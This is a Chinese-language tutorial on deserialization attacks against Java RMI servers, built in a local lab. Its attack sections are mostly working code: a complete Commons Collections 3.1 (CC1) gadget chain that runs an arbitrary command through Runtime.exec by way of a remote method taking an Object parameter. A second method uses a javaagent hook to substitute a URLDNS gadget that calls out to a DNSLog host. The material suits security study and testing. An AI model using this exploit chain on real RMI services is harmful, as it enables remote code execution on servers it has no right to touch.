0x01 前言

在RMI的整个传输过程中,你会发现都是在进行序列化与反序列化
利用这个特性,我们可以尝试对RMI服务端进行反序列化攻击

但想对RMI服务端进行反序列化攻击,需要满足两个条件

  1. 需要RMI服务端有一个不是基础数据类型参数的远程方法
  2. 需要RMI服务端存在有可反序列化利用链的jar包

基础类型为: boolean、char、byte、short、int、long、float、double

0x02 环境

  1. 编辑器为: IntelliJ IDEA
  3. java版本:
  4. java version "1.7.0_80"
  5. Java(TM) SE Runtime Environment (build 1.7.0_80-b15)
  6. Java HotSpot(TM) 64-Bit Server VM (build 24.80-b11, mixed mode)
  8. 使用的架包:
  9. Commons Collections 3.1

0x03 例子一-利用Object类型参数

0x03.1 案例介绍

假设我们现在有一台服务器,这台服务器放注册中心与RMI服务端
然后RMI服务端,创建了个RMITestImpl2类,并向注册中心注册了RMITestImpl2
RMITestImpl2类,里面有两个public方法分别是test()hello(Object o)

现在我们要利用开放的hello(Object o)方法,尝试进行反序列化攻击

0x03.2 目录结构

  1. // 目录结构
  2. ├── RMITest2
  3.    ├── RMITest2Interface.java
  4.    ├── RMIServer
  5.        ├── RMIServerTest2.java
  6.        └── RMITestImpl2.java
  7.    └── RMIExploit
  8.         └── RMIExploitTest.java

0x03.3 公共接口

先定义一个远程接口,这个接口,服务端客户端都要使用到
也就是两台服务器都要保存一份的接口

  1. package RMITest2;
  3. import java.rmi.Remote;
  4. import java.rmi.RemoteException;
  6. /**
  7.  * RMI测试接口
  8.  * 定义一个远程接口, 继承java.rmi.Remote接口
  9.  */
  10. public interface RMITest2Interface extends Remote {
  11.     String test() throws RemoteException;
  13.     String hello(Object o) throws RemoteException;
  14. }

0x03.4 创建注册中心与服务端

接着我们创建个RMITestImpl2类,继承UnicastRemoteObject类,实现RMITest2Interface接口
该类是一个远程接口实现类,用于被客户端调用与执行的
注意: 远程接口实现类必须继承UnicastRemoteObject类,用于生成存根/桩(Stub)骨架(Skeleton)

  1. package RMITest2.RMIServer;
  3. import RMITest2.RMITest2Interface;
  5. import java.rmi.RemoteException;
  6. import java.rmi.server.UnicastRemoteObject;
  8. public class RMITestImpl2 extends UnicastRemoteObject implements RMITest2Interface {
  9.     /**
  10.      * 调用父类的构造函数
  11.      *
  12.      * @throws RemoteException
  13.      */
  14.     protected RMITestImpl2() throws RemoteException {
  15.         super();
  16.     }
  18.     @Override
  19.     public String test() throws RemoteException {
  20.         return "test~";
  21.     }
  23.     /**
  24.      * RMI服务端可被攻击的环境
  25.      *
  26.      * @param o
  27.      * @return
  28.      * @throws RemoteException
  29.      */
  30.     @Override
  31.     public String hello(Object o) throws RemoteException {
  32.         return "hello~";
  33.     }
  34. }

创建注册中心与服务端
客户端可以通过这个输出的URL直接访问远程对象,不需要知道远程实例对象的名称
因为服务端将RMITestImpl2对象,注册到了RMI注册中心上,并且公开了一个固定的路径 ,供客户端访问

  1. package RMITest2.RMIServer;
  3. import java.rmi.Naming;
  4. import java.rmi.registry.LocateRegistry;
  6. public class RMIServerTest2 {
  7.     // 注册中心的服务器ip
  8.     public static final String RMI_HOST = "127.0.0.1";
  10.     // 注册中心设置的开放端口
  11.     public static final int RMI_PORT = 9998;
  13.     // RMI服务名称
  14.     public static final String RMI_NAME = "rmi://" + RMI_HOST + ":" + RMI_PORT + "/hello";
  16.     /**
  17.      * 注册中心创建 与 服务端创建
  18.      *
  19.      * @param args
  20.      */
  21.     public static void main(String[] args) {
  22.         try {
  23.             // 创建注册中心
  24.             LocateRegistry.createRegistry(RMI_PORT);
  26.             // 服务端
  27.             // 功能: 注册远程对象RMITestImpl2到RMI注册中心
  28.             Naming.bind(RMI_NAME, new RMITestImpl2());
  30.             // 输出该对象的访问地址
  31.             System.out.println("RMI服务启动成功,服务地址:" + RMI_NAME);
  32.         } catch (Exception e) {
  33.             e.printStackTrace();
  34.         }
  35.     }
  36. }
  41. // 运行该文件

0x03.5 攻击RMI服务端

  1. package RMITest2.RMIExploit;
  3. import RMITest2.RMITest2Interface;
  5. import org.apache.commons.collections.Transformer;
  6. import org.apache.commons.collections.functors.ChainedTransformer;
  7. import org.apache.commons.collections.functors.ConstantTransformer;
  8. import org.apache.commons.collections.functors.InvokerTransformer;
  9. import org.apache.commons.collections.map.TransformedMap;
  11. import java.lang.annotation.Retention;
  12. import java.lang.reflect.Constructor;
  13. import java.rmi.Naming;
  14. import java.util.HashMap;
  15. import java.util.Map;
  17. public class RMIExploitTest {
  18.     public static void main(String[] args) {
  19.         try {
  20.             String cmd = "open -a /System/Applications/Calculator.app";
  21.             Object payload = getPayload(cmd);
  23.             // 服务地址
  24.             String rmiName = "rmi://127.0.0.1:9998/hello";
  26.             // 查找远程RMI服务
  27.             RMITest2Interface rt2 = (RMITest2Interface) Naming.lookup(rmiName);
  29.             // 调用远程接口RMITest2Interface类的hello方法
  30.             // 并且尝试进行漏洞利用
  31.             String result2 = rt2.hello(payload);
  33.             // 输出服务端执行结果
  34.             System.out.println(result2);
  35.         } catch (Exception e) {
  36.             e.printStackTrace();
  37.         }
  38.     }
  40.     /**
  41.      * CC1反序列化
  42.      * @param cmd
  43.      * @return
  44.      * @throws Exception
  45.      */
  46.     private static Object getPayload(String cmd) throws Exception {
  47.         //构建一个 transformers 的数组,在其中构建了任意函数执行的核心代码
  48.         Transformer[] transformers = new Transformer[]{
  49.                 new ConstantTransformer(Runtime.class),
  50.                 new InvokerTransformer(
  51.                         "getMethod",
  52.                         new Class[]{String.class, Class[].class},
  53.                         new Object[]{"getRuntime", new Class[0]}
  54.                 ),
  55.                 new InvokerTransformer(
  56.                         "invoke",
  57.                         new Class[]{Object.class, Object[].class},
  58.                         new Object[]{null, new Object[0]}
  59.                 ),
  60.                 new InvokerTransformer(
  61.                         "exec",
  62.                         new Class[]{String.class},
  63.                         new Object[]{cmd}
  64.                 )
  65.         };
  67.         // 将 transformers 数组存入 ChaniedTransformer 这个继承类
  68.         Transformer transformerChain = new ChainedTransformer(transformers);
  70.         // 创建个 Map 准备拿来绑定 transformerChina
  71.         Map innerMap = new HashMap();
  72.         // put 第一个参数必须为 value, 第二个参数随便写
  73.         innerMap.put("value", "xxxx");
  75.         // 创建个 transformerChina 并绑定 innerMap
  76.         Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
  78.         // 反射机制调用AnnotationInvocationHandler类的构造函数
  79.         Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  80.         Constructor ctor = clazz.getDeclaredConstructor(Class.class, Map.class);
  82.         //取消构造函数修饰符限制
  83.         ctor.setAccessible(true);
  85.         //获取 AnnotationInvocationHandler 类实例
  86.         Object instance = ctor.newInstance(Retention.class, outerMap);
  87.         return instance;
  88.     }
  89. }
  95. // 运行结果
  96. 运行完毕以后,服务端会弹出一个计算器

0x03.6 原理

直接看为何在传输Object类的参数时,服务端会进行反序列化的吧
进入到sun.rmi.server.UnicastServerRef类的dispatch方法,打几个断点,如下:
image.png

接着在服务端,进行debug,记得要在服务端哦
image.png
image.png

然后在客户端,点击运行,就可以正式开始debug了
image.png

先看服务端var8hashToMethod_Map存着啥
image.png
就是服务端实现的RMI服务对象的二个方法
image.png
如果说var8 == null那就爆错

服务端对于Object类型参数反序列化的点位于unmarshalValue方法内,让我们继续debug看看
image.png
image.png
其中
var0是服务端接口方法设定的入参参数类型
var1是从客户端传来的的序列化数据流
var0.isPrimitive判断是否是默认基础类型

基础类型为: boolean、char、byte、short、int、long、float、double

而我们这个例子里面var0是为Ojbect不为基础类型所以进入了else进行了var1.readObject()

你会发现代码里面写着,当服务端设定的RMI方法的入参不是基础数据类型时,就会执行反序列化输入流
所以并不需要说那个参数就一定要是Ojbect只是说如果参数是Ojbect更加容易利用

这里有个Java的坑,就是Integer.TYPE的返回是int类
所以如果var0传的是Integer类似的参数,也是会进入else进行了var1.readObject()
因为Integer == Integer.TYPE为false,注意咯

那么不是基础数据类型又不是Ojbect的参数,如何利用呢?让我们查看例子二

0x04 例子二-绕过Object类型参数

0x04.1 前言

这里直接搬运 https://xz.aliyun.com/t/7930 啦啦0咯咯 大佬的话了

在例子一中,注意到:当服务端设定的RMI方法的入参不是基础数据类型时,就会执行反序列化输入流。
这里并不强求是要Object类型的参数才能var1.readObject

这里看似没问题,但是你细品

假如服务端的RMI方法接口的入参是name(java.lang.String)(String不在基础数据类型表中)
那么它就会进入else分支,执行var1.readObject(),但是var1又是我们客户端输出的值
假如我们输入的不是一个java.lang.String的值,而是一个Object对象
那么实际上也会被反序列化解析,即Object.readObject()完成任意命令执行

这种情况下,利用方法就被扩展了
从RMI服务端需要起一个具有Object参数的RMI方法 的利用条件限制
扩展到了RMI服务端只需要起一个具有不属于基础数据类型参数的RMI方法(比如String啥的)

攻击原理核心在于替换原本不是Object类型的参数变为Object类型。
之前我们修改String接口变为Object,是可以做到修改参数类型,但是那样还会修改method hash
所以这里只能修改底层代码,去替换原本的参数为我们想要的payload

afanti总结了以下途径(后发现是国外老哥先提出来的)

  1. 直接修改rmi底层源码
  2. 在运行时,添加调试器hook客户端,然后替换
  3. 在客户端使用Javassist工具更改字节码
  4. 使用代理,来替换已经序列化的对象中的参数信息

途径不同,目的都是一样的,我们使用afanti的RemoteObjectInvocationHandler项目来试验下可行性
github地址: https://github.com/Afant1/RemoteObjectInvocationHandler

接下来就让我们本地实验测试一下

0x04.2 前期准备

首先下载: https://github.com/Afant1/RemoteObjectInvocationHandler 进行编译

  1. // 使用方法
  2. 这是一个 java maven项目
  3. 导入idea,打开刚刚好下载好的源码
  4. 打开: /RemoteObjectInvocationHandler/pom.xml 安装对应的包
  5. 第一次安装依赖包需要比较久,慢慢等不要急
  7. 1mvn package 打好jar
  8. 2、运行RmiServer
  9. 3、运行RmiClient前,VM options参数填写:-javaagent:C:\...\xxx\rasp-1.0-SNAPSHOT.jar
  10. 4、最终会hookRemoteObjectInvocationHandler函数,修改第三个参数为URLDNS gadget
  12. 安装好对应包以后,打开:RemoteObjectInvocationHandlerHookVisitor.java修改DNSLog为自己的

接着打包成jar,如下图:
image.png
image.png
记住这个地址即可

0x04.3 目录结构

  1. // 目录结构
  2. ├── RMITest3
  3.    ├── RMITest3Interface.java
  4.    ├── RMIServer
  5.        ├── RMIServerTest3.java
  6.        └── RMITestImpl3.java
  7.    └── RMIClient
  8.         └── RMIClientTest.java

0x04.3 公共接口

先定义一个远程接口,这个接口,服务端客户端都要使用到
也就是两台服务器都要保存一份的接口

  1. package RMITest3;
  3. import java.rmi.Remote;
  4. import java.rmi.RemoteException;
  6. /**
  7.  * RMI测试接口
  8.  * 定义一个远程接口, 继承java.rmi.Remote接口
  9.  */
  10. public interface RMITest3Interface extends Remote {
  11.     String name(String s) throws RemoteException;
  12. }

0x04.4 创建注册中心与服务端

接着我们创建个RMITestImpl3类,继承UnicastRemoteObject类,实现RMITest3Interface接口
该类是一个远程接口实现类,用于被客户端调用与执行的

  1. package RMITest3.RMIServer;
  3. import RMITest3.RMITest3Interface;
  5. import java.rmi.RemoteException;
  6. import java.rmi.server.UnicastRemoteObject;
  8. public class RMITestImpl3 extends UnicastRemoteObject implements RMITest3Interface {
  9.     /**
  10.      * 调用父类的构造函数
  11.      *
  12.      * @throws RemoteException
  13.      */
  14.     protected RMITestImpl3() throws RemoteException {
  15.         super();
  16.     }
  18.     /**
  19.      * RMI服务端可被攻击的环境
  20.      *
  21.      * @param s
  22.      * @return
  23.      * @throws RemoteException
  24.      */
  25.     @Override
  26.     public String name(String s) throws RemoteException {
  27.         return s;
  28.     }
  29. }

创建注册中心与服务端
客户端可以通过这个输出的URL直接访问远程对象,不需要知道远程实例对象的名称
因为服务端将RMITestImpl3对象,注册到了RMI注册中心上,并且公开了一个固定的路径 ,供客户端访问

  1. package RMITest3.RMIServer;
  3. import java.rmi.Naming;
  4. import java.rmi.registry.LocateRegistry;
  6. public class RMIServerTest3 {
  7.     // 注册中心的服务器ip
  8.     public static final String RMI_HOST = "127.0.0.1";
  10.     // 注册中心设置的开放端口
  11.     public static final int RMI_PORT = 9998;
  13.     // RMI服务名称
  14.     public static final String RMI_NAME = "rmi://" + RMI_HOST + ":" + RMI_PORT + "/t3";
  16.     /**
  17.      * 注册中心创建 与 服务端创建
  18.      *
  19.      * @param args
  20.      */
  21.     public static void main(String[] args) {
  22.         try {
  23.             // 创建注册中心
  24.             LocateRegistry.createRegistry(RMI_PORT);
  26.             // 服务端
  27.             // 功能: 注册远程对象RMITestImpl3到RMI注册中心
  28.             Naming.bind(RMI_NAME, new RMITestImpl3());
  30.             // 输出该对象的访问地址
  31.             System.out.println("RMI服务启动成功,服务地址:" + RMI_NAME);
  32.         } catch (Exception e) {
  33.             e.printStackTrace();
  34.         }
  35.     }
  36. }
  41. // 运行该文件

0x04.5 攻击RMI服务端

  1. package RMITest3.RMIClient;
  3. import RMITest3.RMITest3Interface;
  5. import java.rmi.Naming;
  7. public class RMIClientTest {
  8.     public static void main(String[] args) {
  9.         try {
  10.             // 服务地址
  11.             String rmiName = "rmi://127.0.0.1:9998/t3";
  13.             // 查找远程RMI服务
  14.             RMITest3Interface rt3 = (RMITest3Interface) Naming.lookup(rmiName);
  16.             // 调用远程接口RMITest3Interface类的name方法
  17.             // 并且尝试进行漏洞利用
  18.             String result3 = rt3.name("test");
  20.             // 输出服务端执行结果
  21.             System.out.println(result3);
  22.         } catch (Exception e) {
  23.             e.printStackTrace();
  24.         }
  25.     }
  26. }

创建好这个文件以后,先别着急运行,先打开这个
image.png

虚拟机现项: -javaagent:/xxxx/RemoteObjectInvocationHandler/target/rasp-1.0-SNAPSHOT.jar
image.png
image.png
然后在运行RMIClientTest类,接着dnslog就会收到消息了

0x05 结尾

像这样攻击服务端的,现在来非常少了,只能说心里记一下,知道这个如果遇到了满足条件的情况下,可以试试